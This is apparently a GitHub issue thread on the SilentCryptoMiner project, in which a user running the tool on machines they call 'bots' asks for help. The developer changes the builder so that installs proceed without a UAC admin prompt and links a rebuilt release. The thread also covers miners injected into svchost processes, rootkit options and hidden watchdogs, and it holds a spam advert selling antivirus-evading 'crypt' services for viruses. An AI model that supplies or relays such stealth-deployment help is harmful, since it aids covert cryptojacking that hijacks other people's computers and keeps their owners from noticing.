### ISSUE TITLE
2.4.0 update not working properly for non-admins

### ISSUE THREAD

**Issue by arblad1990** [UnamSanctam/SilentCryptoMiner#801]
hey, with the old version 2.3.2 I always made a build which installs on computers which dont have admin access. Now that the new update is out I tried making my build with normal settings (no run as system, no exclusions, no rootkit etc.) just the basic settings + install. The file that was created didn't have the UAC shield, however when you launch it it pops up with a UAC prompt asking for admin privilege's to install "updater.exe", is there anyway this can be fixed so that I can update my bots?

**Comment by UnamSanctam** [comment]
Ah right, I added `-Verb RunAs` for Windows 8 administrator compatibility, I'll change it to only add that if administrator.

**Comment by UnamSanctam** [comment]
I've reuploaded the builder with a hotfix for that, can you redownload it and see if it works as intended https://github.com/UnamSanctam/SilentCryptoMiner/releases/download/scm-v2.4.0/Silent.Crypto.Miner.Builder.zip?

**Comment by arblad1990** [comment]
Thanks that seems to have fixed that issue!

I've just tested the new one but it seems like it doesn't replace old miners (despite overwrite old miners being ticked):

![image](https://user-images.githubusercontent.com/78943172/170888721-92a6719a-6c42-4ea4-9dda-bb4fbb8aa6b4.png)

with 2 svchosts having been injected into as well (which shows they are both on there and mining):

![image](https://user-images.githubusercontent.com/78943172/170888767-8b908681-1b21-4138-8d4d-db1ce5a3bc75.png)

**Comment by UnamSanctam** [comment]
It will overwrite the file (if it's the same location) but it can't kill the old miners and/or watchdog since they are "hidden", only reason the uninstaller/checker can find them is because they know the identifying strings.

**Comment by CryptService** [comment]
🔥Buy crypt files for the miner or for your virus https://t.me/Crypt_Service 
@Cryptex777 🔥

**Comment by arblad1990** [comment]
thanks! that was the issue - I installed it under a different name in the new version, will have to make sure they use the same one.
